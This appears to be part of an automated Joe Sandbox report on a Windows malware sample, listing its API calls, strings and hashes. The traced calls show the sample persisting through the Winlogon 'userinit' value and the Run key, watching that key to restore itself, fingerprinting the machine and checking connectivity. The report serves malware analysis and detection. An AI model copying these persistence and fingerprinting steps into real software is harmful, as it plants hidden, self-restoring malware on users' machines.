                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(01339B58), ref: 012F7DFE
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 012F7E27
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 012F7E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 012F7E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F7E6B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000010), ref: 012F7E7F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 012F7E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,01339B58), ref: 012F7EA1
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 012F7F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F7F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7F5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F7F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F7F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 012F7F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,01339B58,01339B5A), ref: 012F7FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F7FC7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F7FD1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F7FD7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 012F800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012F801C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 012F8039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012F8044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 012F8067
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$OpenProcess$FlushObjectQuerySingleWait$#680AllocChangeCloseCreateEventExistsFileFreeNotifyPathValidatememset
                                                                                                                                                                                                              • String ID: ,$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3618708129-1653949461
                                                                                                                                                                                                              • Opcode ID: 7f02b1a58748a465583908ba42718d82447eba8bfb541dacc777d4bc04e5e65e
                                                                                                                                                                                                              • Instruction ID: 55b8f685ae63576b039bfb6dbd05af03c5761aada83d5ded4346ad84dfd48d6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f02b1a58748a465583908ba42718d82447eba8bfb541dacc777d4bc04e5e65e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7271D571650206FBEB319F689C59FFABB6DEF44744F10415CFB01AB285D6B09A05C7A0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(SYSTEM!841618!025F9049,00000000,00000104,774D2F70,00000000), ref: 012E3106
                                                                                                                                                                                                                • Part of subcall function 01304FF0: memset.MSVCRT(?,00000000,000000DF,00000000,00000000), ref: 01305023
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305032
                                                                                                                                                                                                                • Part of subcall function 01304FF0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 01305039
                                                                                                                                                                                                                • Part of subcall function 01304FF0: memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305051
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 01305068
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130506E
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 0130508F
                                                                                                                                                                                                                • Part of subcall function 01304FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050B6
                                                                                                                                                                                                                • Part of subcall function 01304FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050CA
                                                                                                                                                                                                                • Part of subcall function 013050F0: memset.MSVCRT(?,00000000,000000DE,00000000,00000000), ref: 01305124
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305133
                                                                                                                                                                                                                • Part of subcall function 013050F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0130513A
                                                                                                                                                                                                                • Part of subcall function 013050F0: memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305152
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetComputerNameA.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000), ref: 01305169
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130516F
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetComputerNameA.KERNEL32(00000000,00000104,00000104,?,?,?,?,00000000,00000000), ref: 01305190
                                                                                                                                                                                                                • Part of subcall function 013050F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051B7
                                                                                                                                                                                                                • Part of subcall function 013050F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,774D2F70,00000000), ref: 012E3144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,774D2F70,00000000), ref: 012E3151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,774D2F70,00000000), ref: 012E3168
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,774D2F70,00000000), ref: 012E318E
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,InstallDate,00000000,?,?,?,?,?,774D2F70,00000000), ref: 012E31AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,774D2F70,00000000), ref: 012E31B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,774D2F70,00000000), ref: 012E31DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,774D2F70,00000000), ref: 012E31E8
                                                                                                                                                                                                              • _snprintf.MSVCRT(SYSTEM!841618!025F9049,00000104,%s!%s!%08X,00000000,00000000,?,?,774D2F70,00000000), ref: 012E3201
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000004,%02X,54535953), ref: 012E325F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,774D2F70,00000000), ref: 012E328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E3297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,012F6E07,?,?,774D2F70,00000000), ref: 012E32A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32A6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,774D2F70,00000000), ref: 012E32B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,774D2F70,00000000), ref: 012E32C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32C8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!841618!025F9049$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                              • API String ID: 2057876665-4119864956
                                                                                                                                                                                                              • Opcode ID: a1d953e8855f9ddaa30d86294339ae13d9a8c360e7e46f2b2058ae29f9fa8271
                                                                                                                                                                                                              • Instruction ID: 2f2f96d6711d4aa43477d66847aebfab5de51384a9e70e20f6c5cd5037843a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d953e8855f9ddaa30d86294339ae13d9a8c360e7e46f2b2058ae29f9fa8271
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A51C571A10216ABDB20EFA99C49FEBBBFCFF84701F444559FA44D7245D6B09A04CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012E3344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012E3351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 012E336E
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,01325748,000FF0FF), ref: 012E3389
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 012E33A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 012E33DE
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,01339B58,00000104), ref: 012E33FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 012E33D4
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 012E339D
                                                                                                                                                                                                              • SystemDrive, xrefs: 012E333F
                                                                                                                                                                                                              • userinit, xrefs: 012E33F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$#680BackslashCloseEnvironmentInformationPathQueryValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3116569548-2324515132
                                                                                                                                                                                                              • Opcode ID: 75a779915b9ed93b3341fc6687734f1735871e24cdc35075a44cc6bc8c2d1525
                                                                                                                                                                                                              • Instruction ID: b4ed9db8e948437bac93a3087aeb604c7d4fde1105ede21a48db7e1c78687cea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a779915b9ed93b3341fc6687734f1735871e24cdc35075a44cc6bc8c2d1525
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16210875A90208FBEB24EF90DC8AFED777CAB44B05F504588F700A6184D6F467448BA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 382 1304880-130489f OpenProcess 383 1304975-130497f 382->383 384 13048a5-13048b4 OpenProcessToken 382->384 385 1304952-1304966 GetHandleInformation 384->385 386 13048ba-13048d2 GetTokenInformation 384->386 385->383 389 1304968-130496c 385->389 387 13048d4-13048ea CharUpperA 386->387 388 1304926-1304934 386->388 390 13048f0-13048f5 387->390 388->385 391 1304936-1304943 GetHandleInformation 388->391 389->383 392 130496e-130496f CloseHandle 389->392 393 1304904-1304914 CharUpperA 390->393 394 13048f7-1304900 390->394 391->385 395 1304945-1304949 391->395 392->383 397 1304922 393->397 398 1304916-130491a 393->398 394->390 396 1304902 394->396 395->385 399 130494b-130494c CloseHandle 395->399 396->388 397->388 398->397 400 130491c-1304920 398->400 399->385 400->388 400->397
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 01304908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 1998047302-3691563785
                                                                                                                                                                                                              • Opcode ID: c7dd6f6d6aff218efe8c75a0a860ae8ced45a603782ca62405294cd33768dfc5
                                                                                                                                                                                                              • Instruction ID: 83b73c867403c3a9865658dceec0666058859893757622bc264e142a581e9167
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7dd6f6d6aff218efe8c75a0a860ae8ced45a603782ca62405294cd33768dfc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 073181719002096FEB22DFA8C958BEE7BFCAB45319F0480A8EB45A61C5D7749708CB60

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 401 1304ff0-1305043 memset GetProcessHeap HeapAlloc 402 1305049-130505b memset 401->402 403 13050da-13050e1 401->403 402->403 404 130505d-130506c GetUserNameA 402->404 405 1305095-13050a0 call 12fade0 404->405 406 130506e-1305077 GetLastError 404->406 405->403 412 13050a2 405->412 406->405 407 1305079-1305088 call 12f41e0 406->407 407->403 413 130508a-1305093 GetUserNameA 407->413 414 13050a3-13050be StrChrIA 412->414 413->403 413->405 415 13050c0-13050d0 lstrcpynA 414->415 416 13050d2-13050d7 414->416 415->416 416->414 417 13050d9 416->417 417->403
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000DF,00000000,00000000), ref: 01305023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305032
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 01305039
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 01305068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130506E
                                                                                                                                                                                                                • Part of subcall function 012F41E0: GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                                • Part of subcall function 012F41E0: HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                                • Part of subcall function 012F41E0: memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0130508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 01305000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocNameProcessUser$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 3937782766-374730529

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 418 12f36b0-12f36cb #680 419 12f36cd-12f36f3 RegOpenKeyExA 418->419 420 12f3727-12f374d RegOpenKeyExA 418->420 423 12f371c-12f3725 419->423 424 12f36f5-12f3716 RegQueryValueExA RegCloseKey 419->424 421 12f374f-12f3770 RegQueryValueExA RegCloseKey 420->421 422 12f3776-12f377d 420->422 421->422 425 12f377f-12f3784 422->425 423->420 423->425 424->423
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(774D2F70,00000000,012F6E1F), ref: 012F36B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012F36EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3FD3a,00000000,?,00000000,?), ref: 012F370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F3716
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012F3749
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3FD3a,00000000,?,00000000,?), ref: 012F3766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F3770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9E2B3FD3a$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-795292181

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 434 1305a50-1305a8e GetSystemWindowsDirectoryA 435 1305a90-1305a95 434->435 435->435 436 1305a97-1305ad6 GetVolumeInformationA 435->436 437 1305ad8-1305ada 436->437 438 1305add-1305ae2 436->438 437->438 439 1305ae5-1305aea 438->439 439->439 440 1305aec-1305af6 439->440 441 1305afb-1305b14 440->441 442 1305b16 441->442 443 1305b1b-1305b2f _snprintf 441->443 442->443 444 1305b30-1305b36 443->444 444->444 445 1305b38-1305b4f 444->445 446 1305b51-1305b53 445->446 447 1305af8 445->447 448 1305b58-1305b77 446->448 447->441 449 1305b79 448->449 450 1305b7e-1305b9c _snprintf 448->450 449->450 450->448 451 1305b9e-1305ba4 450->451
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 01305A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 01305AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT(9E2B3F07a,00000104,01325748,?,?), ref: 01305B23
                                                                                                                                                                                                              • _snprintf.MSVCRT(61C5C0AD,00000104,01325748,00FFAAFF,?), ref: 01305B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$61C5C0AD$9E2B3F07a
                                                                                                                                                                                                              • API String ID: 2823094833-1044879240

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 452 12e6de0-12e6e08 memset call 12f4f80 454 12e6e0d-12e6e0f 452->454 455 12e6e27-12e6e2e 454->455 456 12e6e11 454->456 458 12e6e3e-12e6e4f 455->458 459 12e6e30-12e6e38 call 12e6690 455->459 457 12e6e17-12e6e25 Sleep call 12f4f80 456->457 457->455 461 12e6e50-12e6e58 458->461 459->458 467 12e6eda-12e6edf 459->467 464 12e6e5a 461->464 465 12e6e93-12e6ea8 WaitForMultipleObjects 461->465 468 12e6e60-12e6e63 464->468 469 12e6eb0-12e6ec2 CloseHandle 465->469 468->465 470 12e6e65-12e6e7c call 12e63f0 CreateThread 468->470 469->469 471 12e6ec4-12e6ecb 469->471 476 12e6e7e-12e6e85 470->476 477 12e6e87-12e6e88 470->477 473 12e6ecd-12e6ed3 471->473 474 12e6ed9 471->474 473->461 473->474 474->467 478 12e6e89-12e6e91 476->478 477->478 478->465 478->468
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000040C,00000000,00000000), ref: 012E6E00
                                                                                                                                                                                                                • Part of subcall function 012F4F80: IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                                • Part of subcall function 012F4F80: #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                                • Part of subcall function 012F4F80: DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 012E6E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E6A90,00000000,00000000,00000000,774D0F10,?,00000000,00000000), ref: 012E6E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,774D0F10,?,00000000,00000000), ref: 012E6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 012E6EB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$#680AliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1772768556-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 479 1304980-13049b7 OpenProcess 480 13049f9-1304a01 479->480 481 13049b9-13049d2 GetProcessTimes 479->481 482 13049d4-13049d7 481->482 483 13049da-13049ea GetHandleInformation 481->483 482->483 483->480 484 13049ec-13049f0 483->484 484->480 485 13049f2-13049f3 CloseHandle 484->485 485->480
                                                                                                                                                                                                              APIs
